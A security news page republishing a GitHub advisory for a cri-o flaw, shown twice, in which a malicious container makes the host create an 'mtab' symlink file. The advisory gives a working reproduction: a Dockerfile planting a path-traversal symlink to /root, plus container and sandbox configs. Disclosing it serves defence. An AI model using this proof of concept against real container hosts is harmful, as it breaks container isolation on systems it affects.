Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-j9hf-98c3-wrm8: malicious container creates symlink "mtab" on the host External

Impact

A malicious container can affect the host by taking advantage of code cri-o added to show the container mounts on the host.

A workload built from this Dockerfile:

FROM docker.io/library/busybox as source
RUN mkdir /extra && cd /extra && ln -s ../../../../../../../../root etc

FROM scratch

COPY --from=source /bin /bin
COPY --from=source /lib /lib
COPY --from=source /extra .

and this container config:

{
  "metadata": {
      "name": "busybox"
  },
  "image":{
      "image": "localhost/test"
  },
  "command": [
      "/bin/true"
  ],
  "linux": {
  }
}

and this sandbox config

{
  "metadata": {
    "name": "test-sandbox",
    "namespace": "default",
    "attempt": 1,
    "uid": "edishd83djaideaduwk28bcsb"
  },
  "linux": {
    "security_context": {
      "namespace_options": {
        "network": 2
      }
    }
  }
}

will create a file on host /host/mtab

Patches

1.30.1, 1.29.5, 1.28.7

Workarounds

Unfortunately not

References

Are there any links users can visit to find out more?

ghsa
Open in Source
#linux#docker

Impact

A malicious container can affect the host by taking advantage of code cri-o added to show the container mounts on the host.

A workload built from this Dockerfile:

FROM docker.io/library/busybox as source
RUN mkdir /extra && cd /extra && ln -s ../../../../../../../../root etc

FROM scratch

COPY --from=source /bin /bin
COPY --from=source /lib /lib
COPY --from=source /extra .

and this container config:

{
  "metadata": {
      "name": "busybox"
  },
  "image":{
      "image": "localhost/test"
  },
  "command": [
      "/bin/true"
  ],
  "linux": {
  }
}

and this sandbox config

{
  "metadata": {
    "name": "test-sandbox",
    "namespace": "default",
    "attempt": 1,
    "uid": "edishd83djaideaduwk28bcsb"
  },
  "linux": {
    "security_context": {
      "namespace_options": {
        "network": 2
      }
    }
  }
}

will create a file on host /host/mtab

Patches

1.30.1, 1.29.5, 1.28.7

Workarounds

Unfortunately not

References

Are there any links users can visit to find out more?

References

  • GHSA-j9hf-98c3-wrm8

Related news

Red Hat Security Advisory 2024-3700-03

Red Hat Security Advisory 2024-3700-03 - Red Hat OpenShift Container Platform release 4.14.29 is now available with updates to packages and images that fix several bugs and add enhancements.

ghsa: Latest News

GHSA-8fh4-942r-jf2g: LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/device/services.inc.php
ghsa